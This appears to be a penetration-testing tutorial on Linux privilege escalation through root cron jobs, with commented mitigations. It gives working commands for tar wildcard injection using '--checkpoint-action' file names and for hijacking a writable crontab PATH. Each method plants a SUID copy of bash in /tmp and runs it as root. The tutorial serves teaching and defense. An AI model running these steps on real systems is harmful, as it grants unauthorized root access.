Cron Jobs Part 2

Wildcard Injection

# The shell, not ls, expands `*` into the names found in the current directory;
# ls only ever sees the resulting argument list.
ls *
# Creates a file literally named '-la'. Once it exists, `ls *` receives "-la"
# as an argument and parses it as options instead of as a file name.
# NOTE(review): the path is /home/user/files, so this assumes `ls *` is run
# from that directory.
# Defensive form: `ls -- *` or `ls ./*`, so that no expanded name can be read
# as an option.
touch '/home/user/files/-la'
# System-crontab style entry (it has a user field): every minute, as root,
# run /home/admin/scripts/backup.sh.
# NOTE(review): the body of backup.sh is not shown on this page. The technique
# that follows only applies if the script runs tar with a bare `*` inside a
# directory that an unprivileged user can write to -- confirm against the script.
* * * * * root /home/admin/scripts/backup.sh
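# Demonstration of tar wildcard injection against the root cron job.
# Root cause: a root-run script calls tar with a bare `*` in a directory that an
# unprivileged user can write to. The shell expands `*` to file names, and GNU
# tar parses names that begin with `-` as options.
# NOTE(review): backup.sh is not shown here; its use of tar with `*` is inferred
# from the --checkpoint options below.
# Mitigation: in the root script use `tar ... -- *` or `./*` (or an explicit
# file list), keep root jobs out of user-writable directories, and mount /tmp
# nosuid. Audit for file names starting with `--checkpoint` and for
# unexpected set-id binaries under /tmp.

# creating a program that copies /bin/bash over to /tmp and adds the SUID bit on it
# (chmod +s sets both the set-user-ID and set-group-ID bits)
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \
/home/user/files/pwn.sh
# creates a file '--checkpoint=1' that will be interpreted as an argument
touch /home/user/files/--checkpoint=1
# creates a file '--checkpoint-action=exec=sh\ pwn.sh' that will be interpreted as an argument
touch /home/user/files/--checkpoint-action=exec=sh\ pwn.sh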
root@debian:~#

Redefining $PATH

root@kali:~# $PATH
bash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
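# Root cause of this section: the crontab PATH lists a user-writable directory
# (/home/user) first, and the root job below is named without an absolute path,
# so the first matching file found along PATH is what root executes.
# Mitigation: give root cron entries absolute command paths and keep only
# root-owned, non-writable directories in the crontab PATH.

# path variable
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# cron job running a script called nothing.sh every minute as root
* * * * * root nothing.sh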
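# Demonstration of the PATH weakness: the root cron job runs `nothing.sh` by
# bare name and /home/user comes first in the crontab PATH, so a file of that
# name placed there is run as root.
# Mitigation: absolute paths in root cron entries, no user-writable directories
# in the crontab PATH, and /tmp mounted nosuid. Audit for unexpected set-id
# binaries under /tmp.

# creating a program called nothing.sh that copies /bin/bash over to /tmp and adds the SUID bit on it
# (chmod +s sets both the set-user-ID and set-group-ID bits)
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \
/home/user/nothing.sh
# change the permissions of the file so it's executable
chmod +x /home/user/nothing.sh
# wait 1 minute for the cron job to run
# executes the copy of bash we created with the SUID bit; -p stops bash from
# resetting its effective user ID at startup
/tmp/bash -p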
root@debian:~#


I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP
